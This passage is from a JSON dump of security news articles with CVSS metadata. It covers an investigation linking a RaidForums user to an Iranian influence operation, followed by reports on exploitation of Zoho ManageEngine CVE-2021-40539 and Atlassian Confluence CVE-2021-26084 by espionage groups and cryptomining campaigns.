turn allowed them to access the data, despite this data being encrypted.&quot;\n\n_Original story:_\n\nThe email address that Sheriff used to register at RaidForums -- **kelvinmiddelkoop@hotmail.com** -- appears in [an affidavit for a search warrant filed by the FBI](<https://www.justice.gov/usao-ndca/press-release/file/1334571/download>) roughly a year ago. That FBI warrant came on the heels of [an investigation published by security firm **FireEye**](<https://www.mandiant.com/resources/report-suspected-iranian-influence-operation>), which examined an Iranian-based network of inauthentic news sites and social media accounts aimed at the United States., U.K. and other western audiences.\n\n&quot;This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests,&quot; FireEye researchers wrote. &quot;These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran.&quot;\n\n\n\nThe FBI says the domains registered by the email address tied to Sheriff&#x27;s RaidForums account were used in service of the Liberty Front Press, a network of phony news sites thought to originate from Iran.\n\nAccording to the FBI affidavit, the address kelvinmiddelkoop@hotmail.com was used to register at least three different domains for phony news sites, including awdnews[.]com, sachtimes[.]com, and whatsupic[.]com. A reverse WHOIS search on that email address at [DomainTools.com](<https://www.domaintools.com>) (an advertiser on this site) shows it was used to register 17 domains between 2012 and 2021, including moslimyouthmedia[.]com, moslempress[.]com, and realneinovosti[.]net.\n\nA review of Sheriff&#x27;s postings to RaidForum reveals he has used two other nicknames since registering on the forum in December 2021: &quot;**Unindicted**,&quot; and &quot;**threat_actor**.&quot; In several posts, Sheriff taunts one FireEye employee by name.\n\nIn a Jan. 3, 2022 post, Sheriff says their &quot;team&quot; is seeking licenses for the Cobalt Strike penetration testing tool, and that they&#x27;re prepared to pay $3,000 - $4,000 per license. Cobalt Strike is a legitimate security product that is sold only to vetted partners, but compromised or ill-gotten Cobalt Strike licenses [frequently are used in the run-up to ransomware attacks](<https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks>).\n\n&quot;We will buy constantly, make contact,&quot; Sheriff advised. &quot;Do not ask if we still need)) the team is interested in licenses indefinitely.&quot;\n\nOn Jan. 4, 2022, Sheriff tells RaidForums that their team is in need of access to a specific data broker platform, and offers to pay as much as $35,000 for that access. Sheriff says they will only accept offers that are guaranteed through the forum&#x27;s escrow account.\n\nThe demand for escrow in a sales thread is almost universally a sign that someone means business and they are ready to transact on whatever was advertised or requested. That&#x27;s because escrow transactions necessarily force the buyer to make a deposit with the forum&#x27;s administrators before proceeding on any transaction.\n\nSheriff appears to have been part of a group on RaidForums that [offered to buy access to organizations that could be extorted with ransomware or threatened with the publication of stolen data](<https://krebsonsecurity.com/wp-content/uploads/2022/02/kela-scrape.pdf>) (PDF screenshot from threat intelligence firm [KELA](<https://ke-la.com>)). In a &quot;scam report&quot; filed against Sheriff by another RaidForums member on Dec. 31, 2021, the claimant says Sheriff bought access from them and agreed to pay 70 percent of any ransom paid by the victim organization.\n\nInstead, the claimant maintains, Sheriff only paid them roughly 25 percent. &quot;The company pay $1.35 million ransom and only payment was made of $350k to me, so i ask for $600k to fix this dispute,&quot; the affiliate wrote.\n\nIn another post on RaidForums, a user aptly named &quot;FBI Agent&quot; advised other denizens to steer clear of Sheriff&#x27;s ransomware affiliate program, noting that transacting with this person could run afoul of sanctions from the U.S. Department of the Treasury&#x27;s **Office of Foreign Assets Control** (OFAC) that restrict commerce with people residing in Iran.\n\n&quot;To make it clear, we don&#x27;t work with individuals under the OFAC sanctions list, which @Sheriff is under,&quot; the ransomware affiliate program administrator wrote in reply.\n\nRaidForums says Sheriff was referred to the forum by **Pompompurin**, the same hacker who used a security hole in the FBI&#x27;s website last year [to blast a phony alert about a cybercrime investigation to state and local authorities](<https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/>). Pompompurin has been quite active on RaidForums for the past few years, frequently posting databases from newly-hacked organizations, and [selling access to stolen information](<https://www.securityweek.com/fbi-hacker-offers-sell-data-allegedly-stolen-robinhood-breach>).\n\nReach via Twitter, Pompompurin said they had no idea who might have offered money and information on Sheriff, and that they would never &quot;snitch&quot; on Sheriff.\n\n&quot;I know who he is but I&#x27;m not saying anything,&quot; Pompompurin replied.\n\nThe information about Sheriff was brought to my attention by an anonymous person who initially contacted KrebsOnSecurity saying they wanted to make a donation to the publication. When the person offering the gift asked if it was okay that the money came from a ransomware transaction, I naturally declined the offer.\n\nThat person then proceeded to share the information about the connection between Sheriff&#x27;s email address and the FBI search warrant, as well as the account&#x27;s credentials.\n\nThe same identity approached several other security researchers and journalists, one of whom was able to validate that the kelvinmiddelkoop@hotmail.com address actually belonged to Sheriff&#x27;s account. Those researchers were likewise offered tainted donations, except the individual offering the donation seemed to use a different story with each person about who they were or why they were offering money. Others contacted by the same anonymous user said they also received unsolicited details about Sheriff.\n\nIt seems clear that whoever offered that money and information has their own agenda, which may also involve attempts to make members of the news media appear untrustworthy for agreeing to accept stolen funds. However, the information they shared checks out, and since there is precious little public reporting on the source of the ICRC intrusion, the potential connection to hacker groups based in Iran seems worth noting.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T16:44:19", "type": "krebs", "title": "Red Cross Hack Linked to Iranian Influence Operation?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-02-16T16:44:19", "id": "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "href": "https://krebsonsecurity.com/2022/02/red-cross-hack-linked-to-iranian-influence-operation/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:07", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgGACK0sbY62-eZqfAxY507UACUU6L-2jv6DylVUuLJIlKvZ70mFTDCqexN_Ra9wCH0vczNR_SyX8JDu9w9hoQxe9JbFzT0l1V7Qa5nT7ZJu8hDShes_BHVy5lqMKr5lp4Z8Nnxrz-vXgqUp4O2XOrauZ5X_iVYbimAWmw_5f-dDDkeDGPvLqUzcWSH>)\n\nAt least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a [recently patched critical vulnerability](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>) in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution.\n\nThe spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor.\n\n\"The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation,\" researchers from Palo Alto Networks' Unit 42 threat intelligence team [said](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>) in a report. \"Several other tools have novel characteristics or have not been publicly discussed as being used in previous attacks, specifically the NGLite backdoor and the KdcSponge stealer.\"\n\nTracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), the vulnerability relates to an authentication bypass vulnerability affecting [REST API](<https://en.wikipedia.org/wiki/Representational_state_transfer>) URLs that could enable remote code execution, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to warn of active exploitation attempts in the wild. The security shortcoming has been rated 9.8 out of 10 in severity.\n\nReal-world attacks weaponizing the bug are said to have commenced as early as August 2021, according to CISA, the U.S. Federal Bureau of Investigation (FBI), and the Coast Guard Cyber Command (CGCYBER).\n\nUnit 42's investigation into the attack campaign found that successful initial exploitation activities were consistently followed by the installation of a Chinese-language JSP web shell named \"[Godzilla](<https://github.com/BeichenDream/Godzilla/>),\" with select victims also infected with a custom Golang-based open-source Trojan called \"[NGLite](<https://github.com/Maka8ka/NGLite>).\"\n\n\"NGLite is characterized by its author as an 'anonymous cross-platform remote control program based on blockchain technology,'\" researchers Robert Falcone, Jeff White, and Peter Renals explained. \"It leverages New Kind of Network ([NKN](<https://nkn.org/>)) infrastructure for its command and control (C2) communications, which theoretically results in anonymity for its users.\"\n\nIn subsequent steps, the toolset enabled the attacker to run commands and move laterally to other systems on the network, while simultaneously transmitting files of interest. Also deployed in the kill chain is a novel password-stealer dubbed \"KdcSponge\" orchestrated to steal credentials from domain controllers.\n\nUltimately, the adversary is believed to have targeted at least 370 Zoho ManageEngine servers in the U.S. alone beginning September 17. While the identity of the threat actor remains unclear, Unit 42 said it observed [correlations in tactics and tooling](<https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage>) between the attacker and that of [Emissary Panda](<https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html>) (aka APT27, TG-3390, BRONZE UNION, Iron Tiger, or LuckyMouse).\n\nMicrosoft, which is also independently tracking the same campaign, tied it to an emerging threat cluster \"[DEV-0322](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)\" that's operating out of China and has been previously detected exploiting a zero-day flaw in SolarWinds Serv-U managed file transfer service in July 2021. The Redmond-based company also pointed out the deployment of an implant called \"[Zebracon](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\" that allows the malware to connect to compromised Zimbra email servers with the goal of retrieving additional instructions.\n\n\"Organizations that identify any activity related to ManageEngine ADSelfService Plus indicators of compromise within their networks should take action immediately,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>), in addition to recommending \"domain-wide password resets and double Kerberos Ticket Granting Ticket (TGT) password resets if any indication is found that the ['NTDS.dit](<https://attack.mitre.org/techniques/T1003/003/>)' file was compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T14:39:00", "type": "thn", "title": "Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T03:15:09", "id": "THN:D0F9B64B55AE6B07B3B0C0540189389E", "href": "https://thehackernews.com/2021/11/experts-detail-malicious-code-dropped.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-17T06:36:28", "description": "[](<https://thehackernews.com/images/-sCM6j8kvs2s/YTme1HWgMII/AAAAAAAADwM/Wyzei6Ccbz8Z4NBhBhEEtrtdCIkbrEkGwCLcBGAsYHQ/s0/zoho.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild.\n\nThe flaw, tracked as [CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>), concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus builds up to 6113 are impacted.\n\nManageEngine ADSelfService Plus is an integrated self-service password management and a single sign-on solution for Active Directory and cloud apps, enabling admins to enforce two-factor authentication for application logins and users to reset their passwords.\n\n\"CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>), urging companies to apply the latest security update to their ManageEngine servers and \"ensure ADSelfService Plus is not directly accessible from the internet.\"\n\n\"The exploitation of ManageEngine ADSelfService Plus poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software,\" CISA [said](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>). \"Successful exploitation of the vulnerability allows an attacker to place webshells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\"\n\nIn an independent advisory, Zoho [cautioned](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) that it's a \"critical issue\" and that it's \"noticing indications of this vulnerability being exploited.\"\n\n\"This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\" the company said. \"This would allow the attacker to carry out subsequent attacks resulting in RCE.\"\n\nCVE-2021-40539 is the fifth security weakness disclosed in ManageEngine ADSelfService Plus since the start of the year, three of which \u2014 [CVE-2021-37421](<https://nvd.nist.gov/vuln/detail/CVE-2021-37421>) (CVSS score: 9.8), [CVE-2021-37417](<https://nvd.nist.gov/vuln/detail/CVE-2021-37417>) (CVSS score: 9.8), and [CVE-2021-33055](<https://nvd.nist.gov/vuln/detail/CVE-2021-33055>) (CVSS score: 9.8) \u2014 were addressed in recent updates. A fourth vulnerability, [CVE-2021-28958](<https://nvd.nist.gov/vuln/detail/CVE-2021-28958>) (CVSS score: 9.8), was rectified in March 2021.\n\nThis development also marks the second time a flaw in Zoho enterprise products has been actively exploited in real-world attacks. In March 2020, APT41 actors were [found](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>) leveraging an RCE flaw in ManageEngine Desktop Central ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), CVSS score: 9.8) to download and execute malicious payloads in corporate networks as part of a global intrusion campaign.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T05:45:00", "type": "thn", "title": "CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189", "CVE-2021-28958", "CVE-2021-33055", "CVE-2021-37417", "CVE-2021-37421", "CVE-2021-40539"], "modified": "2021-09-17T04:49:55", "id": "THN:1678C3AE3BCB0278860461A943C3DF30", "href": "https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-ECBRNAQfxt4/YTc5IJ3yF6I/AAAAAAAADvk/AKO-gQEBwOICCTQJArFbT7OQXrde61d-wCLcBGAsYHQ/s0/jenkin.jpg>)\n\nThe maintainers of Jenkins\u2014a popular open-source automation server software\u2014have disclosed a security breach after unidentified threat actors gained access to one of their servers by exploiting a recently disclosed vulnerability in Atlassian Confluence service to install a cryptocurrency miner.\n\nThe \"successful attack,\" which is believed to have occurred last week, was mounted against its Confluence service that had been deprecated since October 2019, leading the team to take the server offline, rotate privileged credentials, and reset passwords for developer accounts.\n\n\"At this time we have no reason to believe that any Jenkins releases, plugins, or source code have been affected,\" the company [said](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) in a statement published over the weekend.\n\nThe disclosure comes as the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:15", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhJ3jtRKAfkDnJBg2CSeJO9eEak4pHCPUwsoYC1yc8-mRtN2fWdq14kYmZ4eITvVA_TkOaz34D7Gfz2LSNKAbVwByP1IbkyZkXFdMhGnjmA1tSd6GffL2DMmgX3VEYI5N3wlRhVqGUmMzGn7YbisQQBHLt_xETCq41gult7pRhYNQ-b2eB8mGAOpaFD>)\n\nOpportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.\n\nTracked as **CVE-2021-26084** (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.\n\n\"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server,\" researchers from Trend Micro [noted](<https://www.zerodayinitiative.com/blog/2021/9/21/cve-2021-26084-details-on-the-recently-exploited-atlassian-confluence-ognl-injection-bug>) in a technical write-up detailing the weakness. \"Successful exploitation can result in arbitrary code execution in the security context of the affected server.\"\n\nThe vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.\n\nThe in-the-wild attacks come after the U.S. Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of mass exploitation attempts following the vulnerability's public disclosure in late August this year.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjXqPkBhwuKJGvxWO_1FjoHCeEAOKy7E3nNIvjWNAaBric3ybUCOe0G41xg2vfrMqSM83zyPKtMMcPzdThUioKg0niqP0et9VrT22pAmRJy9LwQNAVdvO8EvweuRbnJo7aiGWul1cqiTjlXFZw4WyEKmu-Nh6M-u0F-6LxkM2A7vbklzdx2bLU2Afye>)\n\nIn [one such attack](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, [corroborated the findings](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>), uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.\n\nAlso detected by Imperva, [Juniper](<https://blogs.juniper.net/en-us/threat-research/muhstik-botnet-targeting-confluence-servers-with-cve-2021-26084>), and [Lacework](<https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/>) is exploitation activity conducted by Muhstik, a China-linked [botnet](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) known for its [wormlike self-propagating capability](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>) to infect Linux servers and IoT devices since at least 2018.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgbIFk6qnQLGyg0h6oyooiekl3f6weqXbcxtTWMY4--VWq6XAjXEMzqzKoFtdfOJrwkHrMnA7zKzbUIZD20ywylRihiM2XgTRt1QSmjWMQkRomZ48jftJM5I_98FvPixhOZqMp_rr6nq7vQBTlnknWVxhVXzyno6XFul5zNkpbdaqmYBM9R--Nxg2HT>)\n\nFurthermore, Palo Alto Networks' Unit 42 threat intelligence team said it [identified and prevented attacks](<https://www.paloaltonetworks.com/blog/security-operations/cve-2021-26084-linux-exploitation-in-the-wild/>) that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.\n\n\"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain,\" Imperva researchers said. \"RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T15:31:00", "type": "thn", "title": "Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns", "bulletinFamily": "info", "cvss2": 